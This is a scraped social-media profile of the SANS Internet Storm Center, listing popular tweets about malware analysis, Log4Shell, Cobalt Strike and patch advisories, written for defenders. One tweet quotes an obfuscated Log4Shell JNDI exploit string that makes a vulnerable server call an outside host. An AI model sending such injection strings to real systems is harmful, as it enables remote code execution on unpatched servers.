SANS.edu Internet Storm Center Profile
SANS.edu Internet Storm Center

@sans_isc

115,971 Followers
86 Following
2,374 Media
13,112 Statuses

@sans_isc@infosec.exchange - Global Network Security Information Sharing Community

Jacksonville, FL, USA
Joined June 2007
@sans_isc
SANS.edu Internet Storm Center
4 years
To whoever is trying to run these Python backdoors on our F5 #BigIP honeypot: Slow down... it doesn't work because you keep overwriting your files. Or randomize your filenames better.
Tweet media one
18
215
889
@sans_isc
SANS.edu Internet Storm Center
3 years
Hunting phishing websites with favicon hashes
Tweet media one
6
189
618
@sans_isc
SANS.edu Internet Storm Center
11 months
Brute-Force ZIP Password Cracking with : FP Fix
Tweet media one
3
115
544
@sans_isc
SANS.edu Internet Storm Center
3 months
A quick note about xz-utils backdoor: 1 - luckily, this was caught early. 2 - most run xz-utils 5.2/5.4. 5.6 is bad. 3 - quick check: `xz -V` 4 - Thanks to people who paid attention
22
202
536
@sans_isc
SANS.edu Internet Storm Center
1 year
Brute-Force ZIP Password Cracking with
Tweet media one
4
78
460
@sans_isc
SANS.edu Internet Storm Center
4 years
Sooty: SOC Analyst's All-in-One Tool
Tweet media one
7
118
454
@sans_isc
SANS.edu Internet Storm Center
3 years
Example of how attackers are trying to push crypto miners via Log4Shell
Tweet media one
5
154
448
@sans_isc
SANS.edu Internet Storm Center
2 years
guess we no longer have to worry about CVE-2022-1388 if this makes the rounds... @f5 #bigip
Tweet media one
9
134
393
@sans_isc
SANS.edu Internet Storm Center
3 years
#log4shell is now a @cnn headline. This means: This is no longer an emergency. Going back to infocon green. Log4j will be a multi-year marathon. Do not treat it like a sprint or you will run out of breath quickly.
8
88
386
@sans_isc
SANS.edu Internet Storm Center
3 years
Wireshark 3.6.0 Released
Tweet media one
2
40
346
@sans_isc
SANS.edu Internet Storm Center
4 years
Broken phishing accidentally exploiting Outlook zero-day
Tweet media one
5
127
326
@sans_isc
SANS.edu Internet Storm Center
3 years
Let's see if a kitten picture will get us to 100k followers by the end of the month ;-) #networkcats #kittens #networksupportkitten #evilbutcute
Tweet media one
28
44
310
@sans_isc
SANS.edu Internet Storm Center
2 years
Over 20 thousand servers have their iLO exposed to the internet, many are outdated and vulnerable
Tweet media one
7
120
305
@sans_isc
SANS.edu Internet Storm Center
3 years
Decrypting Cobalt Strike Traffic With a "Leaked" Private Key
Tweet media one
0
102
278
@sans_isc
SANS.edu Internet Storm Center
3 years
Wireshark 3.4.4 Released
Tweet media one
0
75
263
@sans_isc
SANS.edu Internet Storm Center
3 years
Top sources of CVE-2021-44228 exploit attempts. 45.155.205.233 (hostway[.]ru), 171.25.193 (tor exits) 185.220.100.242 (tor exit) 18.27.197.252 (MIT[.]edu) #log4j2 #log4j #cve202144228
Tweet media one
11
138
258
@sans_isc
SANS.edu Internet Storm Center
3 years
New Release of Sysmon Adding Detection for Process Tampering
Tweet media one
2
70
253
@sans_isc
SANS.edu Internet Storm Center
3 years
Active Directory Certificate Services (ADCS - PKI) domain admin vulnerability
Tweet media one
0
117
248
@sans_isc
SANS.edu Internet Storm Center
2 years
OpenSSL 3.0.7 is out. TL;DR: Punycode issue with international domains used in certs. Needs CA to sign malicious cert. Doesn't look like a "huge deal" IMHO. Relax.. Patch.. Repeat... #openssl
4
111
248
@sans_isc
SANS.edu Internet Storm Center
3 years
ISC diary: Emotet returns on Monday 2021-11-15, and @malware_traffic reviews recent activity
Tweet media one
3
126
248
@sans_isc
SANS.edu Internet Storm Center
3 years
Seeing now #log4shell exploit attempts that obfuscate: ${jndi:${lower:l}${lower:d}a${lower:p}://world80[.]log4j[.]bin${upper:a}ryedge[.]io:80/callback} and also ldaps vs ldap. This particular attempt is from Binaryedge (researcher scans)
Tweet media one
4
102
245
@sans_isc
SANS.edu Internet Storm Center
4 years
so far I found 4 domains registered yesterday with the keyword "Beirut". They appear to be inactive so far. Be careful out there. Verify any entities asking for help. #beirut #lebanon
Tweet media one
0
155
222
@sans_isc
SANS.edu Internet Storm Center
3 years
Simple Powershell Ransomware Creating a 7Z Archive of your Files
Tweet media one
1
82
218
@sans_isc
SANS.edu Internet Storm Center
3 years
TCPView v4.0 Released
Tweet media one
1
66
227
@sans_isc
SANS.edu Internet Storm Center
1 year
Detecting (Malicious) OneNote Documents
Tweet media one
0
64
214
@sans_isc
SANS.edu Internet Storm Center
3 years
Video: Cobalt Strike & DNS - Part 1
Tweet media one
1
70
204
@sans_isc
SANS.edu Internet Storm Center
3 years
Decrypting Cobalt Strike Traffic With Keys Extracted From Process Memory
Tweet media one
0
61
207
@sans_isc
SANS.edu Internet Storm Center
3 years
Decoding Cobalt Strike Traffic
1
77
202
@sans_isc
SANS.edu Internet Storm Center
3 years
Malware Analysis with elastic-agent and Microsoft Sandbox
Tweet media one
0
52
190
@sans_isc
SANS.edu Internet Storm Center
2 years
Please remember: Port 445 is just ONE of the ports that may reach #RPC (CVE-2022-26809) on Windows. #MSRPC does Port 135 (and high port) or in some cases HTTP as well. Don't "close some ports" but "only open ports you need open". #allowlist #dontblocklist
3
74
193
@sans_isc
SANS.edu Internet Storm Center
3 years
We are so far seeing 3 main types of useragents exploiting #log4jshell : - "bingsearchlib[.]com" (not related to Bing/MSFT AFAIK) - modified AutoMate 1.0 user agent - user-agent with Base64 encoded exploit.
Tweet media one
5
87
191
@sans_isc
SANS.edu Internet Storm Center
5 years
Tip: BASE64 Encoded PowerShell Scripts are Recognizable by the Amount of Letter As
Tweet media one
3
95
189
@sans_isc
SANS.edu Internet Storm Center
3 years
CyberChef: Analyzing OOXML Files for URLs
Tweet media one
1
76
190
@sans_isc
SANS.edu Internet Storm Center
2 years
New Microsoft Office Attack Vector via "ms-msdt" Protocol Scheme
Tweet media one
2
78
187
@sans_isc
SANS.edu Internet Storm Center
2 years
James Webb JPEG With Malware
Tweet media one
5
56
183
@sans_isc
SANS.edu Internet Storm Center
2 years
The #msdt 0-day currently being exploited can be blocked by removing the handler. Note that this may block legit uses (but not sure there are any/enough to not apply this workaround).
@DidierStevens
Didier Stevens
2 years
FYI:
Tweet media one
Tweet media two
Tweet media three
2
78
362
2
100
186
@sans_isc
SANS.edu Internet Storm Center
2 years
And Here They Come Again: DNS Reflection Attacks #dns #abitofarant #oneofthosedays
Tweet media one
2
48
175
@sans_isc
SANS.edu Internet Storm Center
4 years
F5 BigIP vulnerability exploitation followed by a backdoor implant attempt
Tweet media one
0
72
172
@sans_isc
SANS.edu Internet Storm Center
3 years
PCAPs and Beacons
Tweet media one
1
52
177
@sans_isc
SANS.edu Internet Storm Center
2 years
ISC Diary: @malware_traffic reviews new #MetaStealer malware first seen on 2022-03-30
Tweet media one
1
58
168
@sans_isc
SANS.edu Internet Storm Center
4 years
Attackers Exploiting WebLogic Servers via CVE-2020-14882 to install Cobalt Strike @oracle #weblogic
Tweet media one
1
70
172
@sans_isc
SANS.edu Internet Storm Center
4 years
Analysis of a triple-encrypted AZORult downloader
Tweet media one
2
91
171
@sans_isc
SANS.edu Internet Storm Center
2 years
Excel 4 Emotet Maldoc Analysis using CyberChef
Tweet media one
6
53
164
@sans_isc
SANS.edu Internet Storm Center
2 years
First Exploitation of Follina Seen in the Wild
Tweet media one
3
76
165
@sans_isc
SANS.edu Internet Storm Center
3 years
Finding Metasploit & Cobalt Strike URLs
Tweet media one
0
72
165
@sans_isc
SANS.edu Internet Storm Center
3 years
PuTTy And FileZilla Use The Same Fingerprint Registry Keys
Tweet media one
1
39
161
@sans_isc
SANS.edu Internet Storm Center
4 years
Current Top IPs scanning for #BigIP #CVE20205902 @f5Networks . cve-2020-5902 117.107.193.98 - Chinese EDU 103.220.209.47 - India Broadband 93.173.92.102 -Israel ISP 18.185.237.34 -Amazon EU 58.49.50.122 - Chinanet 52.119.83.108 -US Mobile ISP 179.9.166.185 -Chile ISP
7
75
152
@sans_isc
SANS.edu Internet Storm Center
4 years
The Microsoft DNS #sigred vulnerability (CVE-2020-1350): drop what you are doing and patch it now (if this isn't what you are doing..). If you don't run MSFT DNS: double check...
3
101
152
@sans_isc
SANS.edu Internet Storm Center
3 years
December 2021 ISC Forensic Challenge - Review the #pcap for a chance at winning a Raspberry Pi
Tweet media one
3
50
149
@sans_isc
SANS.edu Internet Storm Center
2 years
Quickie: CyberChef & Microsoft Script Decoding
Tweet media one
2
48
148
@sans_isc
SANS.edu Internet Storm Center
3 years
RCE in log4j, Log4Shell, or how things can get bad quickly
Tweet media one
1
75
149
@sans_isc
SANS.edu Internet Storm Center
3 years
ISC diary - @malware_traffic presents a #pcap of infection traffic for a new #TrafficAnalysisQuiz
Tweet media one
3
31
144
@sans_isc
SANS.edu Internet Storm Center
3 years
Facebook Outage: Yes, it's DNS (sort of). A super quick analysis of what is going on.
Tweet media one
2
79
143
@sans_isc
SANS.edu Internet Storm Center
4 years
Windows 10 Built-in Packet Sniffer - PktMon
Tweet media one
1
65
141
@sans_isc
SANS.edu Internet Storm Center
4 years
Quick Tip: Cobalt Strike Beacon Analysis
Tweet media one
0
39
137
@sans_isc
SANS.edu Internet Storm Center
2 years
HTML phishing attachments - now with anti-analysis features
Tweet media one
4
54
134
@sans_isc
SANS.edu Internet Storm Center
2 years
ISC Diary: @malware_traffic reviews #TA570 #CVE -2022-30190 ( #Follina ) exploit (ms-msdt) for #Qakbot
Tweet media one
1
59
132
@sans_isc
SANS.edu Internet Storm Center
2 years
Attackers are abusing MSBuild to evade defenses and implant Cobalt Strike beacons
Tweet media one
0
62
131
@sans_isc
SANS.edu Internet Storm Center
3 years
Quickie: Extracting HTTP URLs With tshark
Tweet media one
2
37
132
@sans_isc
SANS.edu Internet Storm Center
5 years
Tip: Sysmon Will Log DNS Queries
Tweet media one
0
56
131
@sans_isc
SANS.edu Internet Storm Center
1 year
CyberChef Version 10 Released
Tweet media one
1
51
130
@sans_isc
SANS.edu Internet Storm Center
3 years
Shipping to Elasticsearch Microsoft DNS Logs
Tweet media one
0
37
131
@sans_isc
SANS.edu Internet Storm Center
3 years
Agent Tesla hidden in a historical anti-malware tool
Tweet media one
1
49
124
@sans_isc
SANS.edu Internet Storm Center
4 years
After the initial flurry of scanning for the #WebLogic flaw yesterday, we are now seeing some "actual" exploit attempts. And of course, people popping calc.exe. If your WebLogic server has a Calculator running this morning: You have a problem!
Tweet media one
2
79
129
@sans_isc
SANS.edu Internet Storm Center
4 years
DeepBlueCLI: Powershell Threat Hunting
Tweet media one
0
55
127
@sans_isc
SANS.edu Internet Storm Center
4 years
ISC diary: @malware_traffic reviews an infection from 2020-10-30 for Emotet -> Qakbot -> more Emotet
Tweet media one
1
40
127
@sans_isc
SANS.edu Internet Storm Center
2 years
ISC Diary: @malware_traffic reviews how #Emotet #spambot traffic no longer uses 0.0.0.0
Tweet media one
0
44
121
@sans_isc
SANS.edu Internet Storm Center
2 years
ISC Diary: @malware_traffic reviews #Matanbuchus activity leading to #CobaltStrike
Tweet media one
2
42
123
@sans_isc
SANS.edu Internet Storm Center
3 years
Building an IDS Sensor with Suricata & Zeek with Logs to ELK
Tweet media one
3
42
125
@sans_isc
SANS.edu Internet Storm Center
2 years
Translating Saitama's DNS tunneling messages
Tweet media one
1
48
118
@sans_isc
SANS.edu Internet Storm Center
1 year
Bypassing PowerShell Strong Obfuscation
Tweet media one
0
34
119
@sans_isc
SANS.edu Internet Storm Center
3 years
Hunting for Phishing Sites Masquerading as Outlook Web Access
Tweet media one
3
35
122
@sans_isc
SANS.edu Internet Storm Center
4 years
Quick Tip: Extracting all VBA Code from a Maldoc
Tweet media one
0
49
120
@sans_isc
SANS.edu Internet Storm Center
3 years
.docx With Embedded EXE
Tweet media one
0
34
115
@sans_isc
SANS.edu Internet Storm Center
3 years
YARA and CyberChef
Tweet media one
0
32
113
@sans_isc
SANS.edu Internet Storm Center
4 years
Malicious Excel Sheet with a NULL VT Score
Tweet media one
4
49
112
@sans_isc
SANS.edu Internet Storm Center
4 years
Quick Tip: Extracting all VBA Code from a Maldoc - JSON Format
Tweet media one
1
29
116
@sans_isc
SANS.edu Internet Storm Center
3 years
Summer of SAM - incorrect permissions on Windows 10/11 hives
Tweet media one
2
51
115
@sans_isc
SANS.edu Internet Storm Center
3 years
Maldoc Analysis With CyberChef
Tweet media one
0
34
115
@sans_isc
SANS.edu Internet Storm Center
3 years
ISC diary - @malware_traffic reviews a #Qakbot ( #Qbot ) infection with #CobaltStrike
Tweet media one
0
38
112
@sans_isc
SANS.edu Internet Storm Center
3 years
Malware analysis - From small BAT file to Mass Logger infostealer
Tweet media one
0
38
113
@sans_isc
SANS.edu Internet Storm Center
4 years
ISC diary: @malware_traffic offers another traffic analysis quiz with Windows-based malware traffic
Tweet media one
3
27
114
@sans_isc
SANS.edu Internet Storm Center
2 years
Traffic Light Protocol (TLP) 2.0 is here
Tweet media one
1
63
109
@sans_isc
SANS.edu Internet Storm Center
2 years
Analyzing Obfuscated VBS with CyberChef
Tweet media one
0
29
111
@sans_isc
SANS.edu Internet Storm Center
4 years
Analyzing FireEye Maldocs
Tweet media one
0
46
109
@sans_isc
SANS.edu Internet Storm Center
6 years
Meltdown and Spectre: clearing up the confusion
3
101
111
@sans_isc
SANS.edu Internet Storm Center
3 years
ISC diary: @malware_traffic analyzes this month's forensic quiz #BazaLoader #CobaltStrike #AnchorDNS
Tweet media one
0
46
108
@sans_isc
SANS.edu Internet Storm Center
3 years
Tweet media one
2
48
109
@sans_isc
SANS.edu Internet Storm Center
3 years
ISC diary by @malware_traffic - Excel spreadsheet --> enable macros --> #SystemBC --> #CobaltStrike
Tweet media one
2
51
106
@sans_isc
SANS.edu Internet Storm Center
3 years
Log4Shell exploited to implant coin miners
Tweet media one
0
38
105
@sans_isc
SANS.edu Internet Storm Center
2 years
Analyzing a Phishing Word Document
Tweet media one
1
37
100
@sans_isc
SANS.edu Internet Storm Center
2 years
ISC Diary: @malware_traffic reviews an example of #CobaltStrike from an #Emotet infection
Tweet media one
1
47
106
@sans_isc
SANS.edu Internet Storm Center
3 years
Log4j / Log4Shell Followup: What we see and how to defend #log4shell #log4j #log4js
Tweet media one
1
57
105
@sans_isc
SANS.edu Internet Storm Center
5 years
Local Malware Analysis with Malice
Tweet media one
0
30
103
@sans_isc
SANS.edu Internet Storm Center
4 years
ISC diary by @malware_traffic: yet another traffic analysis quiz with Windows-based malware traffic
Tweet media one
4
30
105
@sans_isc
SANS.edu Internet Storm Center
1 year
ISC Diary: @malware_traffic reviews DocuSign-themed email leads to script-based infection
Tweet media one
0
28
101
@sans_isc
SANS.edu Internet Storm Center
3 years
Example of Cleartext Cobalt Strike Traffic (Thanks Brad)
Tweet media one
0
27
102
@sans_isc
SANS.edu Internet Storm Center
4 years
Weaponized RTF Document Generator & Mailer in PowerShell
Tweet media one
2
36
101
@sans_isc
SANS.edu Internet Storm Center
3 years
Jumping into Shellcode
Tweet media one
3
41
100
@sans_isc
SANS.edu Internet Storm Center
3 years
More Undetected PowerShell Dropper
Tweet media one
0
24
101